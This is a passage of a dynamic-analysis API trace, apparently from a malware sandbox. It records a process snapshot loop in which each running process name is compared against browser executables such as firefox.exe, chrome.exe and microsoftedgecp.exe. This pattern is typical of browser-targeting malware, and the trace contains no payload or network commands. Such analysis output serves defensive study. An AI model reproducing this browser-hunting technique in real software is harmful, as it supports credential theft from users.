lpString2="firefox.exe") returned 1 [0196.428] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0196.428] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0196.428] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0196.428] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.428] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.429] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.429] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.429] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.429] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0196.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0196.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0196.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0196.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0196.430] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0196.430] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0196.430] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0196.430] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0196.430] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0196.430] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0196.430] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0196.430] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0196.430] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0196.430] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0196.431] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0196.431] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0196.431] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0196.431] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0196.431] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.431] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0196.432] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0196.432] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0196.432] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0196.432] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0196.432] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0196.432] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0196.432] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0196.432] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0196.432] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0196.432] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0196.433] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0196.433] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0196.433] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0196.433] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0196.433] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0196.433] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0196.433] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0196.433] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0196.433] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0196.433] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0196.434] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0196.434] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0196.434] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0196.434] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0196.434] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.434] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0196.435] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0196.435] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0196.435] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0196.435] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0196.435] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0196.435] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0196.435] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0196.435] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0196.435] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0196.435] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0196.436] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0196.436] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0196.436] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0196.436] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0196.436] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.436] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0196.436] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0196.436] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0196.436] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0196.436] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0196.436] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.436] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0196.437] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0196.437] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0196.437] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0196.437] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0196.437] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.437] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0196.438] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0196.438] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0196.438] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0196.438] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0196.438] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0196.438] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0196.438] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0196.438] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0196.438] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0196.438] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0196.439] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0196.439] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0196.439] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0196.439] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0196.439] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.439] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0196.439] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0196.439] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0196.439] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0196.439] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0196.439] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.440] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0196.440] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0196.440] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0196.440] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0196.440] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0196.440] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.440] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0196.441] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0196.441] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0196.441] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0196.441] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0196.441] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0196.441] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0196.441] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0196.441] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0196.441] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0196.441] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0196.442] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0196.442] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0196.442] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0196.442] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0196.442] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.442] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.444] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0196.444] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0196.444] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0196.444] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0196.444] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.445] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.445] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.445] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.445] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.445] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.445] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0196.445] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0196.445] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0196.445] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0196.445] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0196.445] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.446] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.446] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.446] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.446] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.446] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.447] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0196.447] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0196.447] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0196.447] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0196.447] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.447] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.447] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.447] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.447] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.447] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.448] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.448] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.448] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.448] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0196.448] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.448] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0196.448] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0196.448] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0196.448] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0196.448] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0196.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0196.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0196.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0196.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.449] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.490] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.490] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.490] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.491] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0196.491] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.491] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.491] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.491] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.491] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.491] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0196.491] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.491] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.492] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.492] lstrcmpiA (lpString1="explorer.exe", 